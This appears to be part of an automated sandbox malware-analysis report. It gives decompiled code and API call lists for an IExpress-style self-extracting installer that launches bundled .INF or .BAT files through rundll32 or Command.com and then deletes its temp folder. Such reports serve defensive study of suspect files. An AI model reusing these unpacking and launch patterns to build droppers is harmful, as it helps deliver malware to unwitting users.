							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00101680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00101781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E001016B3( &_v1552, 0x400, " ");
										E001016B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00102AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0010171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00101A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00101A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
                                                                                                                                                                                                                                                									_t140 = 0x4b5;
                                                                                                                                                                                                                                                									_push(0);
                                                                                                                                                                                                                                                									_push(0x10);
                                                                                                                                                                                                                                                									_push(0);
                                                                                                                                                                                                                                                									L35:
                                                                                                                                                                                                                                                									_push(_t60);
                                                                                                                                                                                                                                                									E001044B9(0, _t140);
                                                                                                                                                                                                                                                									_t62 = 0;
                                                                                                                                                                                                                                                									goto L54;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t155 = _v1556;
                                                                                                                                                                                                                                                									_t92 = _t155;
                                                                                                                                                                                                                                                									if( *_t155 == 0) {
                                                                                                                                                                                                                                                										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									 *0x109120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                                									 *_v1560 = 1;
                                                                                                                                                                                                                                                									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x101140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                                										 *0x109a34 =  *0x109a34 & 0xfffffffb;
                                                                                                                                                                                                                                                										if( *0x109a40 != 0) {
                                                                                                                                                                                                                                                											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											_t108 = "setupx.dll";
                                                                                                                                                                                                                                                											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										if( *_t155 == 0) {
                                                                                                                                                                                                                                                											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_push( &_v268);
                                                                                                                                                                                                                                                										_push(_t155);
                                                                                                                                                                                                                                                										E0010171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										 *0x109a34 =  *0x109a34 | 0x00000004;
                                                                                                                                                                                                                                                										if( *_t155 == 0) {
                                                                                                                                                                                                                                                											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										E00101680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                                										_t140 = 0x200;
                                                                                                                                                                                                                                                										E00101680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									L53:
                                                                                                                                                                                                                                                									_t62 = 1;
                                                                                                                                                                                                                                                									 *_v1564 = _t156;
                                                                                                                                                                                                                                                									L54:
                                                                                                                                                                                                                                                									_pop(_t152);
                                                                                                                                                                                                                                                									return E00106CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101d9b
                                                                                                                                                                                                                                                0x00101d9b
                                                                                                                                                                                                                                                0x00101da0
                                                                                                                                                                                                                                                0x00101da2
                                                                                                                                                                                                                                                0x00101da5
                                                                                                                                                                                                                                                0x00101da5
                                                                                                                                                                                                                                                0x00101da7
                                                                                                                                                                                                                                                0x00101da8
                                                                                                                                                                                                                                                0x00101dac
                                                                                                                                                                                                                                                0x00101dae
                                                                                                                                                                                                                                                0x00101db4
                                                                                                                                                                                                                                                0x00101db7
                                                                                                                                                                                                                                                0x00101db7
                                                                                                                                                                                                                                                0x00101db9
                                                                                                                                                                                                                                                0x00101dba
                                                                                                                                                                                                                                                0x00101dbe
                                                                                                                                                                                                                                                0x00101dc3
                                                                                                                                                                                                                                                0x00101dce
                                                                                                                                                                                                                                                0x00101dd2
                                                                                                                                                                                                                                                0x00101deb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101df0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101dd2
                                                                                                                                                                                                                                                0x00101bf7
                                                                                                                                                                                                                                                0x00101bfe
                                                                                                                                                                                                                                                0x00101c07
                                                                                                                                                                                                                                                0x00101d55
                                                                                                                                                                                                                                                0x00101d5a
                                                                                                                                                                                                                                                0x00101d5b
                                                                                                                                                                                                                                                0x00101d5d
                                                                                                                                                                                                                                                0x00101d5e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101c1b
                                                                                                                                                                                                                                                0x00101c1b
                                                                                                                                                                                                                                                0x00101c20
                                                                                                                                                                                                                                                0x00101c2c
                                                                                                                                                                                                                                                0x00101c33
                                                                                                                                                                                                                                                0x00101c38
                                                                                                                                                                                                                                                0x00101c3a
                                                                                                                                                                                                                                                0x00101c3a
                                                                                                                                                                                                                                                0x00101c40
                                                                                                                                                                                                                                                0x00101c4b
                                                                                                                                                                                                                                                0x00101c4b
                                                                                                                                                                                                                                                0x00101c5d
                                                                                                                                                                                                                                                0x00101c61
                                                                                                                                                                                                                                                0x00101dd4
                                                                                                                                                                                                                                                0x00101dd4
                                                                                                                                                                                                                                                0x00101dd6
                                                                                                                                                                                                                                                0x00101ddb
                                                                                                                                                                                                                                                0x00101ddc
                                                                                                                                                                                                                                                0x00101dde
                                                                                                                                                                                                                                                0x00101d64
                                                                                                                                                                                                                                                0x00101d64
                                                                                                                                                                                                                                                0x00101d67
                                                                                                                                                                                                                                                0x00101d6c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101c67
                                                                                                                                                                                                                                                0x00101c67
                                                                                                                                                                                                                                                0x00101c6d
                                                                                                                                                                                                                                                0x00101c72
                                                                                                                                                                                                                                                0x00101c74
                                                                                                                                                                                                                                                0x00101c74
                                                                                                                                                                                                                                                0x00101c8e
                                                                                                                                                                                                                                                0x00101c99
                                                                                                                                                                                                                                                0x00101cc0
                                                                                                                                                                                                                                                0x00101cf8
                                                                                                                                                                                                                                                0x00101d07
                                                                                                                                                                                                                                                0x00101d23
                                                                                                                                                                                                                                                0x00101d09
                                                                                                                                                                                                                                                0x00101d14
                                                                                                                                                                                                                                                0x00101d1b
                                                                                                                                                                                                                                                0x00101d1b
                                                                                                                                                                                                                                                0x00101d2b
                                                                                                                                                                                                                                                0x00101d2d
                                                                                                                                                                                                                                                0x00101d2d
                                                                                                                                                                                                                                                0x00101d38
                                                                                                                                                                                                                                                0x00101d39
                                                                                                                                                                                                                                                0x00101d46
                                                                                                                                                                                                                                                0x00101cc2
                                                                                                                                                                                                                                                0x00101cc2
                                                                                                                                                                                                                                                0x00101ccc
                                                                                                                                                                                                                                                0x00101cce
                                                                                                                                                                                                                                                0x00101cce
                                                                                                                                                                                                                                                0x00101cdb
                                                                                                                                                                                                                                                0x00101ce6
                                                                                                                                                                                                                                                0x00101cee
                                                                                                                                                                                                                                                0x00101cee
                                                                                                                                                                                                                                                0x00101e89
                                                                                                                                                                                                                                                0x00101e91
                                                                                                                                                                                                                                                0x00101e92
                                                                                                                                                                                                                                                0x00101e94
                                                                                                                                                                                                                                                0x00101e97
                                                                                                                                                                                                                                                0x00101ea4
                                                                                                                                                                                                                                                0x00101ea4
                                                                                                                                                                                                                                                0x00101c61
                                                                                                                                                                                                                                                0x00101c07
                                                                                                                                                                                                                                                0x00101bd3
                                                                                                                                                                                                                                                0x00101b7b

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00101BE7
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00101BFE
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00101C57
                                                                                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32 ref: 00101C88
                                                                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00101140,00000000,00000008,?), ref: 00101CB8
                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32 ref: 00101D1B
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                                • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00102F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v272;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				struct HWND__* _t12;
                                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				signed int _t22;
                                                                                                                                                                                                                                                				signed int _t25;
                                                                                                                                                                                                                                                				intOrPtr* _t26;
                                                                                                                                                                                                                                                				signed int _t27;
                                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                                                                				intOrPtr* _t44;
                                                                                                                                                                                                                                                				signed int _t46;
                                                                                                                                                                                                                                                				int _t47;
                                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                                				void* _t59;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t43 = __edx;
                                                                                                                                                                                                                                                				_t9 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                                				if( *0x108a38 != 0) {
                                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                                					_t11 = E00105164(_t52);
                                                                                                                                                                                                                                                					_t53 = _t11;
                                                                                                                                                                                                                                                					if(_t11 == 0) {
                                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                                						_t12 = 0;
                                                                                                                                                                                                                                                						L17:
                                                                                                                                                                                                                                                						return E00106CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t14 = E001055A0(_t53); // executed
                                                                                                                                                                                                                                                					if(_t14 == 0) {
                                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t45 = 0x105;
                                                                                                                                                                                                                                                						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                                						_t43 = 0x105;
                                                                                                                                                                                                                                                						_t40 =  &_v272;
                                                                                                                                                                                                                                                						E0010658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                                						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                                						_t44 = 0;
                                                                                                                                                                                                                                                						if(_t36 != 0) {
                                                                                                                                                                                                                                                							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                                							_v276 = _t31;
                                                                                                                                                                                                                                                							if(_t31 != 0) {
                                                                                                                                                                                                                                                								_t45 = _t47;
                                                                                                                                                                                                                                                								_t40 = _t31;
                                                                                                                                                                                                                                                								 *0x10a288("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\", 0); // executed
                                                                                                                                                                                                                                                								_v276();
                                                                                                                                                                                                                                                								if(_t47 != _t47) {
                                                                                                                                                                                                                                                									_t40 = 4;
                                                                                                                                                                                                                                                									asm("int 0x29");
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						FreeLibrary(_t36);
                                                                                                                                                                                                                                                						_t58 =  *0x108a24 - _t44; // 0x0
                                                                                                                                                                                                                                                						if(_t58 != 0) {
                                                                                                                                                                                                                                                							L14:
                                                                                                                                                                                                                                                							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\"); // executed
                                                                                                                                                                                                                                                							if(_t21 != 0) {
                                                                                                                                                                                                                                                								__eflags =  *0x108a2c - _t44; // 0x0
                                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                                									L20:
                                                                                                                                                                                                                                                									__eflags =  *0x108d48 & 0x000000c0;
                                                                                                                                                                                                                                                									if(( *0x108d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                                										_t41 =  *0x109a40; // 0x3, executed
                                                                                                                                                                                                                                                										_t26 = E0010256D(_t41); // executed
                                                                                                                                                                                                                                                										_t44 = _t26;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t22 =  *0x108a24; // 0x0
                                                                                                                                                                                                                                                									 *0x109a44 = _t44;
                                                                                                                                                                                                                                                									__eflags = _t22;
                                                                                                                                                                                                                                                									if(_t22 != 0) {
                                                                                                                                                                                                                                                										L26:
                                                                                                                                                                                                                                                										__eflags =  *0x108a38;
                                                                                                                                                                                                                                                										if( *0x108a38 == 0) {
                                                                                                                                                                                                                                                											__eflags = _t22;
                                                                                                                                                                                                                                                											if(__eflags == 0) {
                                                                                                                                                                                                                                                												E00104169(__eflags);
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_t12 = 1;
                                                                                                                                                                                                                                                										goto L17;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										__eflags =  *0x109a30 - _t22; // 0x0
                                                                                                                                                                                                                                                										if(__eflags != 0) {
                                                                                                                                                                                                                                                											goto L26;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_t25 = E00103BA2(); // executed
                                                                                                                                                                                                                                                										__eflags = _t25;
                                                                                                                                                                                                                                                										if(_t25 == 0) {
                                                                                                                                                                                                                                                											goto L16;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_t22 =  *0x108a24; // 0x0
                                                                                                                                                                                                                                                										goto L26;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t27 = E00103B26(_t40, _t44);
                                                                                                                                                                                                                                                								__eflags = _t27;
                                                                                                                                                                                                                                                								if(_t27 == 0) {
                                                                                                                                                                                                                                                									goto L16;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L20;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t43 = 0x4bc;
                                                                                                                                                                                                                                                							E001044B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                                							 *0x109124 = E00106285();
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t59 =  *0x109a30 - _t44; // 0x0
                                                                                                                                                                                                                                                						if(_t59 != 0) {
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t30 = E0010621E(); // executed
                                                                                                                                                                                                                                                						if(_t30 == 0) {
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						goto L14;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t49 =  *0x108a24;
                                                                                                                                                                                                                                                				if( *0x108a24 != 0) {
                                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                                					_t34 = E00103A3F(_t51);
                                                                                                                                                                                                                                                					_t52 = _t34;
                                                                                                                                                                                                                                                					if(_t34 == 0) {
                                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L5;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(E001051E5(_t49) == 0) {
                                                                                                                                                                                                                                                					goto L16;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t51 =  *0x108a38;
                                                                                                                                                                                                                                                				if( *0x108a38 != 0) {
                                                                                                                                                                                                                                                					goto L5;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L4;
                                                                                                                                                                                                                                                			}




























                                                                                                                                                                                                                                                0x00103089
                                                                                                                                                                                                                                                0x0010305c
                                                                                                                                                                                                                                                0x00103061
                                                                                                                                                                                                                                                0x00103063
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103063
                                                                                                                                                                                                                                                0x0010302b
                                                                                                                                                                                                                                                0x00103032
                                                                                                                                                                                                                                                0x0010303c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010303c
                                                                                                                                                                                                                                                0x00103006
                                                                                                                                                                                                                                                0x0010300c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010300e
                                                                                                                                                                                                                                                0x00103015
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103015
                                                                                                                                                                                                                                                0x00102f80
                                                                                                                                                                                                                                                0x00102f3f
                                                                                                                                                                                                                                                0x00102f46
                                                                                                                                                                                                                                                0x00102f5f
                                                                                                                                                                                                                                                0x00102f5f
                                                                                                                                                                                                                                                0x00102f64
                                                                                                                                                                                                                                                0x00102f66
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102f66
                                                                                                                                                                                                                                                0x00102f4f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102f55
                                                                                                                                                                                                                                                0x00102f5d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00102F93
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00102FB2
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00102FC6
                                                                                                                                                                                                                                                • DecryptFileA.ADVAPI32 ref: 00102FE6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00102FF8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0010301C
                                                                                                                                                                                                                                                  • Part of subcall function 001051E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00102F4D,?,00000002,00000000), ref: 00105201
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 2126469477-1002207402
                                                                                                                                                                                                                                                • Opcode ID: df861ebc162852fc3c9308ca59bf18c96a5086afa4a0d8de7321428f96858a40
                                                                                                                                                                                                                                                • Instruction ID: b0b20dbe6ab761884c96247899e1ef734ecbc44f6afb3d2f4c7996a5d3db04fc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df861ebc162852fc3c9308ca59bf18c96a5086afa4a0d8de7321428f96858a40
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F441A371B012159BDB30AB759C4966A73ACAF58750F004165F9D1C39D6EFF4CEC0CA61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E00102390(CHAR* __ecx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				char _v280;
                                                                                                                                                                                                                                                				char _v284;
                                                                                                                                                                                                                                                				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                                				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                                				int _t36;
                                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                                				CHAR* _t65;
                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                				signed int _t67;
                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                                				_t21 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                                				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                                				_t65 = __ecx;
                                                                                                                                                                                                                                                				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                                					L10:
                                                                                                                                                                                                                                                					_pop(_t62);
                                                                                                                                                                                                                                                					_pop(_t66);
                                                                                                                                                                                                                                                					_pop(_t46);
                                                                                                                                                                                                                                                					return E00106CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E00101680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                                					_t58 = 0x104;
                                                                                                                                                                                                                                                					E001016B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                                					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                                					_t63 = _t22;
                                                                                                                                                                                                                                                					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                						L3:
                                                                                                                                                                                                                                                						_t58 = 0x104;
                                                                                                                                                                                                                                                						E00101680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                                						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                                							_t58 = 0x104;
                                                                                                                                                                                                                                                							E001016B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                                							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                                							DeleteFileA( &_v280);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                                								E001016B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                                								_t58 = 0x104;
                                                                                                                                                                                                                                                								E0010658A( &_v280, 0x104, 0x101140);
                                                                                                                                                                                                                                                								E00102390( &_v284);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                                					} while (_t36 != 0);
                                                                                                                                                                                                                                                					FindClose(_t63); // executed
                                                                                                                                                                                                                                                					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}






















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,00108A3A,001011F4,00108A3A,00000000,?,?), ref: 001023F6
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,001011F8), ref: 00102427
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,001011FC), ref: 0010243B
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00102495
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 001024A3
                                                                                                                                                                                                                                                • FindNextFileA.KERNELBASE(00000000,00000010), ref: 001024AF
                                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 001024BE
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(00108A3A), ref: 001024C5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
